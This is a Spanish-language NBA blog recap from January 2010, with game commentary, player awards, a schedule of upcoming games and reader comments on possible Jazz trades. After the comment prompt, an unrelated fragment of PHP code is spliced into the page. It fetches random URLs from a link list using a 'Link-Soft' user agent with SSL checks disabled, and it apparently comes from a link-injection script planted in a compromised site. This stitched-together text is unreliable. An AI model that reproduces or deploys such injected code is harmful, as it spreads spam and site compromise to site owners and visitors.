La Crónica (04/01/2010)

05 de January de 2010 por txusma

Jornada importantísima, de competencia directa por plazas de playoffs en el este y en el oeste y también muy ilustrativa de lo que está pasando ahora mismo en la liga.

Es sorprendente el bajón por el que está atravesando Atlanta. Los Heat, que tampoco están para tirar cohetes, les pasaron anoche por encima en una actuación casi sonrojante de los Halcones. Wade, como siempre, extraordinario y anoche bien secundado por Beasley.

En el Oeste la marea sube y a algunos se les ve con el agua al cuello. La rebelión la marcan los Thunder que están como cohetes. Anoche ganaron en Chicago con Durant y Westbrook tocando la guitarra. Sorprende su 19-15 y verles defender es una auténtica gozada. En cambio, los Jazz se ponen con 18-16 tras sufrir una terrible pájara en el tercer cuarto de anoche. Es una marca ahora mismo comprometida en el Oeste. Comprometida por equipos como los Hornets, que ya están en el 50% con todo lo que les ha caído. Anoche Devin Brown hizo el partido de su vida. Sufriendo llevan camino de lograrlo.

Con las lesiones que arrastran, los Blazers tampoco van a poder dormirse en los laureles a pesar de su excelente marca. Los Clippers ayer les ganaron bien en el peor partido de Brandon Roy que se recuerda. Andre Miller estuvo magistral y Juwan Howard vuelve a sentirse joven. El equipo pobre de Los Angeles está un pelín cortado del pelotón de playoffs, pero no olvidemos que pronto llega Blake.

PREMIOS

MVP: Casi siempre es Durant pero no hemos de olvidar al otro mega-crack de Oklahoma, Rusell Westbrook, capaz anoche de liderar a su equipo a la victoria frente los Bulls con 29 puntos, 7 rebotes y 6 asistencias.

Rookie: Destacamos al trío de los Thunder. Harden, Ibaka y Maynor demuestran día a día que tiene sitio en esta liga. Anoche aportaron 25 puntos, 12 rebotes y 6 asistencias.

Sorpresa: En un equipo con Chris Paul, David West o Emeka Okafor, cuesta creer que el mejor vaya a ser Devin Brown. Pero lo que seguro que no te crees es que ha sido capaz de anotar 30 puntos. Como decíamos más arriba: el partido de su vida.

Decepción: 4 partidos perdidos llevan los Hawks y no nos extraña con partidos como el de ayer frente los Heat. 75 míseros puntos con todo el quinteto titular por debajo de 11 puntos. Tan sólo Jamaal Crawford se salvó de la quema.

Esfuerzo en vano: 22 puntos y 16 asistencias que no sirvieron para ganar y es que Andre Miller y sus compañeros se han quedado muy solos sobre el parqué.

RAZONES PARA TRASNOCHAR

Esta noche tenemos 9 motivos, en forma de partidos de NBA, para aguardar despiertos la llegada de los Reyes Magos. Aunque para ver un enfrentamiento entre dos equipos con balance positivo habrá que esperar hasta las 4.30 horas, cuando los Rockets visitarán a los Lakers en el Staples. Artest parece recuperado para volver a enfrentarse a sus ex. No estará sin embargo Pau Gasol, o al menos parece lo más prudente después de que una lesión similar le obligase a perderse 11 partidos a principio de temporada. Lo más interesante a priori del resto de la jornada es el enfrentamiento entre los sorprendentes Grizzlies y los maltrechos Blazers (4h00) y, a la misma hora, la visita de los Suns a Sacramento. Magic @ Pacers, Wizards @ Sixers, Bulls @ Bobcats (los tres a la 01h00), Bucks @ Nets (01h30), Pistons @ Mavs (2h30) y Warriors @ Nuggets (03h00) completan la jornada.

Comenta

7 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    ¿No es el momento de que los Jazz cambien de rumbo? Con esa plantilla, con uno de los 3 mejores bases del mundo al frente, con Boozer haciendo un temporadón, con jugadores de tanto talento como Okur y Kirilenko, con Millsap saliendo desde el banco… y resulta que van para atrás. Hace 3 años fueron finalistas del Oeste. Hace dos, semifinalistas. El año pasado ya cayeron en primera ronda. Y este año, como se descuiden, ni Playoffs.

    El otro día Rick Kamla (NBA TV) hablaba de los Jazz y decía que ya estaba bien de excusas. Acusaba a los jugadores de ser muy blandos, de perderse partidos por lesiones menores, de desaparecer fuera de casa y no plantar cara a sus rivales de división.

    Tremendo lo de Devin Brown, justo el día en que Posey le quita el sitio como titular.

    Y la de cosas que han tenido que suceder en los Blazers (lesiones, quiero decir) para que Andre Miller sea quien manda. Quién sabe, tal vez saquen algo positivo de todo lo que están pasando.

    De los Hawks puede que no esperásemos un batacazo como el que están atravesando, pero tampoco era normal lo de antes, que estaban 21-8, casi al nivel de los tres de arriba.

      Citar

  2. PIRATA dice:
    #2

    Alguien sabe como van las votaciones para el All-Star?Dónde se pueden consultar?

      Citar

  3. Txusma dice:
    #3

      Citar

  4. Viva_Dirk dice:
    #4

    Lo de los Jazzs es mas que evidente, tienen que cambiar algo lo antes posible porque si que pueden quedarse sin play-offs y sin posibilididades de elegir un buen pick. Yo salvo a Deron traspasaría a cualquiera, seguramente es el momento ideal de vender a Boozer por un escolta, que se pongan al habla con los Pistons.

      Citar

  5. sergio dice:
    #5

    Boozer-McGrady quizas??

    Tienen contratos similares y Utah tiene un recambio de lujo como Millsap. Aparte, creo q a T-Mac le vendria muy bien un base puro y fisico como Deron.

    Yo siempre que veo un traspaso intento matar dos pajaros de un tiro… Vamos, que por momentos me creo mejor que Donnie Walsh (lo se, tampoco son muchos aires de grandeza)

    (Este Sergio si soy yo)

      Citar

  6. arivas dice:
    #6

    Pues Boozer termina este año y o lo traspasan ahora o es probable que pueda cambiar de aires en verano. Si se mueven parece lógico que sea por ahí y desde luego es un jugador mas que apetecible para culquiera. Viva apunta (acertadamente) algun escolta en Detroit, a mi me estraña que siga allí Hamilton con todas las protestas tras el traspaso de Billups y la llegada de Gordon.
    y que os parece por K.Martin?

    No creo que T-Mac sea la solución, aunque a Houston le vendría de perlas ese trade; de todos modos creo que no tienen contratos similares, que McGrady cobra un pastón!!

      Citar

  7. MagicJohnson32 dice:
    #7

    Lo de McGrady es imposible, ya que cobra casi 11 kilazos más que Boozer.

    Tal vez los Jazz prefieran agotar el contrato de Boozer, y entonces acudir al mercado de FA’s.

    Lo que apunta Arivas sobre Kevin Martin sí que me cuadra a la perfección. Con la aparición de Tyreke Evans, los Kings se van a desprender de Martin antes o después. Y el contrato que tiene, casi 50 kilos los próximos 4 años, se me antoja excesivo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>